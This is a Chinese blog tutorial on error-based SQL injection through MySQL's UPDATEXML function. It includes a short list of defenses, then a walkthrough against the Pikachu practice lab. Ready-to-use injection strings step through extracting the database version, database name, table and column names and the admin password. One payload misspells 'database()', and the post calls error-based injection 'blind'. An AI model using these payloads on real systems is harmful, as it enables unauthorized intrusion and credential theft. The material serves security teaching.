字符串类型漏洞之updatexml函数盲注

最新推荐文章于 2024-05-08 11:41:27 发布
最新推荐文章于 2024-05-08 11:41:27 发布
阅读量1.2k 收藏 13
点赞数 32
分类专栏: SQLMap 网络安全 文章标签: web安全 安全 数据库 安全威胁分析 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbos2004/article/details/138246937
版权

UPDATEXML 是 MySQL 数据库中的一个函数,它用于对 XML 文档数据进行修改和查询。然而,当它被不当地使用或与恶意输入结合时,它可能成为 SQL 注入攻击的一部分,从而暴露敏感信息或导致其他安全漏洞。

在 SQL 注入攻击中,攻击者尝试通过在应用程序的输入字段中插入或“注入”恶意的 SQL 代码片段,来干扰应用程序的正常 SQL 查询。如果应用程序没有正确地验证和清理用户输入,攻击者可能能够执行未经授权的数据库操作。

原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

UPDATEXML 函数在某些情况下可以被用于“盲注”(blind SQL injection)攻击中,以从数据库中提取数据。盲注是指攻击者无法直接看到查询结果的情况,但可以通过观察应用程序的响应(例如,是否产生错误)来推断出查询的结果。

以下是一个简单的例子来说明如何使用 UPDATEXML 进行盲注攻击:

假设有一个容易受到 SQL 注入攻击的查询,它使用用户提供的输入来构建 SQL 语句:

SELECT * FROM users WHERE username = '$username' AND password = '$password';
攻击者可以尝试注入 UPDATEXML 函数来触发一个错误,并通过错误消息的内容来推断出数据库中的信息。例如:

' OR 1=1 AND (SELECT UPDATEXML(1,CONCAT(0x7e,(SELECT @@version),0x7e),1))
这个注入尝试会修改原始的 SQL 查询,导致它执行一个 UPDATEXML 函数调用。如果 UPDATEXML 的第二个参数包含的数据导致一个无效的 XML 文档,MySQL 将抛出一个错误。攻击者通过构造 CONCAT 函数来包含他们想要查询的信息(在这个例子中是数据库的版本号 @@version),并将其夹在两个 0x7e(波浪号 ~ 的 ASCII 值)之间。如果查询成功执行并返回错误,错误消息中可能会包含这些信息,从而泄露给攻击者。

为了防止这种攻击,开发者应该采取以下措施:

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

参数化查询:使用预编译语句或参数化查询来避免直接将用户输入拼接到 SQL 语句中。
输入验证和清理:对用户输入进行严格的验证和清理,确保只接受预期的格式和类型的数据。
错误处理:不要向最终用户显示详细的数据库错误信息。使用自定义错误页面或日志记录来处理错误。
最小权限原则:确保数据库连接使用的帐户具有执行必要操作所需的最小权限。避免使用具有过多权限的数据库帐户。
最后,建议定期进行安全审计和漏洞扫描,以确保应用程序的安全性。

接着我们以Pikachu漏洞平台为例子:

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术
先随便输入一个字符“'”,检查有没有错误返回信息。
如果存在返回错误信息,就说明这里存在sql注入漏洞

QQ截图20240425215406.png

接着我们输入“x%' and updatexml(1,concat(0x7e,version()),0)#
查询当前的数据库版本信息

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

屏幕截图 2024-04-25 220050.png


接着我们获取当前的数据库用户名,输入“x%' and updatexml(1,concat(0x7e,datebase()),0)#
 

屏幕截图 2024-04-25 220356.png


接着我们获取当前报错返回信息行数

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术
输入“x%' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='sqlmap')),0)#

屏幕截图 2024-04-25 223053.png


接着一次次获取表名
x%' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='sqlmap' limit 0,1)),0)#

屏幕截图 2024-04-25 223307.png


接着我们获取列名
x%' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name ='users' limit 0,1)),0)#
 

屏幕截图 2024-04-25 224059.png


接着我们获取登录信息
x%' and updatexml(1,concat(0x7e,(select password from users where username = 'admin' limit 0,1)),0)#

屏幕截图 2024-04-25 224647.png

程序员贵哥
关注
  • 32
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php字符串函数学习之substr()
10-24
主要介绍了php字符串函数学习之substr(),本文讲解了它的定义和用法、参数描述、提示和注释以及多个使用示例,需要的朋友可以参考下
墨者学院-SQL注入漏洞测试(报错盲注
weixin_42939822的博客
03-30 5101
墨者学院-SQL注入漏洞测试(报错盲注
SQL注入漏洞(union + 盲注
m0_61506558的博客
09-16 1526
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库有 MySQL,Oracle, PostgreSQL,SQL Server等。
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
m0_65336233的博客
10-10 617
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
mysql盲注 多字节字符_Web安全-基于SQLI的SQL盲注常用函数实验
weixin_39721953的博客
02-08 112
实验目的通过本实验理解MySQL盲注常用函数的功能,掌握MySQL盲注常用函数在SQL注入中的应用方法,熟悉SQL注入的常见流程。实验环境目标网站:SQLI平台中的Less-5实验原理先来分析一下Less-5源码中GET提交不同参数时的反应(1)如果正确(2)如果错误(3)如果提交?id=1'时浏览器前端的反应可以看到,如果运行返回结果正确的时候只返回you are in...,不会返回数据库当中...
WEB漏洞攻防 - SQL注入 - 盲注
利他者利己,利己者无功。利他利己,利己利他。
07-29 803
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:[这里介绍的是基于MYSQL的函数,其他类型数据库思路相同,仅函数上有些许差异]
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 650
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
SQL注入漏洞,常用注入函数及其pakachu漏洞靶场演示
ytdd66的博客
03-04 1079
SQL:是操作数据库数据的结构化的查询语言,实现对网页应用数据和后台数据库的交互。SQL注入是将表单域或数据包输入的参数,拼接成的SQL语句,传递给Web服务器,进而传给数据库服务器并得到执行,达到获取数据库信息的目的。如果Web应用程序的开发人员对用户输入的数据或Cookie等内容未过滤或者验证就直接传给数据库,就可能导致恶意的SQL语句被执行,进而获取数据库的信息,造成SQL注入攻击。
墨者-SQL注入漏洞测试(报错盲注) 题解
Redredredfish的博客
12-08 436
靶场地址:https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe 依旧是mysql、无防护 ①依旧是公告界面 url:http://219.153.49.228:44679/new_list.php?id=1 1',1' and '1'='1' -- q,1' and '1'='2' -- q判断存在字符型注入,数据库类型为MariaDB ②order by 判断字段数为4,union select无回显 ③尝
server sql 分组 去重 字符串拼接_渗透小结-SQL注入篇
weixin_39950057的博客
01-12 223
什么是sql注入sql注入是一种将sql代码添加到输入参数中,传递到sql解析并执行的一种攻击手法,通过SQL语句,实现无账号登录,甚至篡改数据库。因此,SQL注入也是OWSP TOP 10的常客。寻找sql注入漏洞的方法1、识别web应用的所有输入点,检查是否存在sql注入。2、了解哪些类型请求会触发sql注入,比如一般登陆窗口通过post请求,将用户名和密码进行和数据库的存储的账号密码对比,如...
asp之字符串操作函数
10-31
asp之字符串操作函数
LabVIEW的字符串操作函数
01-19
LabVIEW提供了用于对字符串进行操作的内置Ⅵ和函数,可对字符串进行格式化、解析字符串等编辑操作。字符串操作函数位于程序框图函数选板的“编程→字符串”子选板中,如图1所示。  字符串操作函数包括计算字符串...
C/C++字符串函数之复制函数详解
09-01
下面小编就为大家带来一篇C/C++字符串函数之复制函数详解。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
网络安全风险里的威胁建模
qq_41432686的博客
05-02 858
网络安全的本质是攻防双方的对抗与博弈。然而,由于多种攻防之间的不对称性因素存在,使得攻击者总能在对抗过程中抢占先机。为了更好地了解潜在的威胁和缺陷,实现主动式防御,企业需要重新考虑他们的网络防护方法,而威胁建模(Threat modeling)正是网络安全武器库中关键防御武器。
全面升级企业网络安全 迈入SASE新时代
最新发布
HKT香港电讯的博客
05-08 618
随着数字化业务、云计算、物联网和人工智能等技术的飞速发展,企业的业务部署环境日渐多样化,远程移动设备办公模式的普及,企业多分支机构的加速设立,也使得企业业务系统的用户范围由单一、单点的内部用户扩展至多个分支及多个外部终端,企业数据暴露在互联网中存在安全威胁基于企业运营据点分散化的趋势,越来越多的企业数据暴露在互联网中,网络安全问题层出不穷。企业用户在访问海外互联网时,经常会有不法分子利用不同国家和地区的网络安全环境存在的差异进行网络攻击。
网络安全之密码学技术
缘友一世的博客
04-29 1385
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
网络安全思考题
weixin_62304542的博客
04-27 1385
网络安全渗透思考题
大模型引领未来:探索其在多个领域的深度应用与无限可能【第七章、大模型在科技、网络安全、农业等方面的应用探索】
今晚打老虎的专栏
05-01 984
大型模型在科技、网络安全和农业领域的应用持续演进。在科技中,它们加速了天文学和科学研究的进展。在网络安全领域,大模型提高了网络威胁检测和应对的效率。而在农业中,它们帮助农民做出精准决策,优化产量和质量。这些应用展示了大模型在不同领域的广泛用途,为各行业带来新的发展机遇。
js字符串类型怎么变成函数d的值
04-24
要将一个字符串类型转化为函数d的值,可以使用eval()函数来实现。将字符串作为eval()函数的参数传入,即可将其转化为一个可执行的函数。例如: ``` var str = "function d() {return 'Hello world!'}"; var func = eval(str); console.log(func()); // 输出 “Hello world!” ``` 需要注意的是,eval()函数是一种危险的函数,因为它会执行任何传入其中的代码。如果字符串来源不可靠,可能会引起安全隐患。因此,应该谨慎使用eval()函数

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值